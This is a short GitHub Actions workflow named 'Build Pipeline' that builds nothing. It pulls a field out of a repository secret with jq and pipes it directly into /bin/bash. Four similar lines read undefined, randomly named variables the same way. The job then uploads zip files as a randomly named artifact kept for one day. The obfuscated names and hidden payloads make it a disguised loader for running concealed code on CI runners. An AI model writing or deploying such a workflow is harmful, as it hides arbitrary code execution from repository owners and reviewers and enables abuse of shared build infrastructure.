name: Build Pipeline
on:
  workflow_dispatch:

permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  runner:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Go
        env:
          nm11: ${{ secrets.nm11 }}
        run: |
          printf '%s' "$nm11" | jq -r .veje74 | /bin/bash
          echo $hrqq99281 | jq -r .qr2 | /bin/bash
          printf '%s' "$cnzd39146" | jq -r .go84 | /bin/bash
          echo $d4 | jq -r .dxjpm34878 | /bin/bash
          printf '%s' "$rtln77" | jq -r .kd9 | /bin/bash

      - name: Archive results
        uses: actions/upload-artifact@v4
        with:
          name: t6O0aIww
          path: "*.zip"
          retention-days: 1
